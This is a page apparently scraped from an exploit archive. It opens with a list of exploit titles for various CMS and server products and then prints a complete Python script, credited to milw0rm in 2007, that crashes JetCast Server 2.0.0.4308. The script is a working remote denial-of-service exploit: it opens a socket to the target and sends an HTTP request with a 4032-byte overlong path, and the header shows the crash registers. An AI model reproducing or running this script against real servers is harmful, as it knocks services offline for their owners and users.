477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
64 lines
1.5 KiB
Python
Executable file
64 lines
1.5 KiB
Python
Executable file
#!/usr/bin/python
|
|
""" ____
|
|
__ __/ ___|___ _ __ ___
|
|
\ \ / / | / _ \| '__/ _ \
|
|
\ V /| |__| (_) | | | __/
|
|
\_/ \____\___/|_| \___| _
|
|
_ __ _ __ ___ ___ ___ _ __ | |_ ___ _
|
|
| '_ \| '__/ _ \/ __|/ _ \ '_ \| __/ __| |_|
|
|
| |_) | | | __/\__ \ __/ | | | |_\__ \ _
|
|
| .__/|_| \___||___/\___|_| |_|\__|___/ |_|
|
|
|_| _
|
|
_ //
|
|
\\//
|
|
GENRE: //\\PLOIT
|
|
// `
|
|
PROGRAM: JetCast Server 2.0.0.4308
|
|
EXPLOiT TYPE: 0day remote DoS exploit
|
|
EXPLOiT LANGUAGE: Python
|
|
DEBUG iNFO: [Module JSMP3OGG]
|
|
EAX 100355B8 JSMP3OGG.100355B8
|
|
ECX 00000007
|
|
EDX 00002000
|
|
EBX 00CB415A
|
|
ESP 00DCDEC0
|
|
EBP 00DCDECC
|
|
ESI 00000000
|
|
EDI 1002FA64 ASCII "Mozilla"
|
|
EIP 1002737C JSMP3OGG.1002737C
|
|
|
|
MOV AH,BYTE PTR DS:[ESI]; C0000005 (ACCESS VIOLATION)
|
|
|
|
Bug found / exploit written by vCore <share0005@o2.pl>
|
|
Tested on JetCast Server 2.0.0.4308 - Windows XP ServicePack2
|
|
____ _
|
|
/ ___|_ __| | ___ _
|
|
| | / _ \ / _` |/ _ \ |_|
|
|
| |__| (_) | (_| | __/ _
|
|
\____\___/ \__,_|\___| |_|
|
|
|
|
"""
|
|
from time import sleep
|
|
from socket import *
|
|
|
|
target = '127.0.0.1'
|
|
port = 8000
|
|
buf = "A" * 4032
|
|
|
|
header = (
|
|
'GET /%s.mp3 HTTP/1.0\r\n'
|
|
'Host: %s\r\n'
|
|
'User-Agent: WinampMPEG/5.19\r\n'
|
|
'Accept: */*\r\n'
|
|
'Icy-MetaData:1\r\n'
|
|
'Connection: close\r\n') % (buf, target)
|
|
|
|
s = socket(AF_INET, SOCK_STREAM)
|
|
s.connect((target, port))
|
|
s.send(header)
|
|
sleep(2)
|
|
s.close()
|
|
|
|
print "DONE"
|
|
|
|
# milw0rm.com [2007-09-13]
|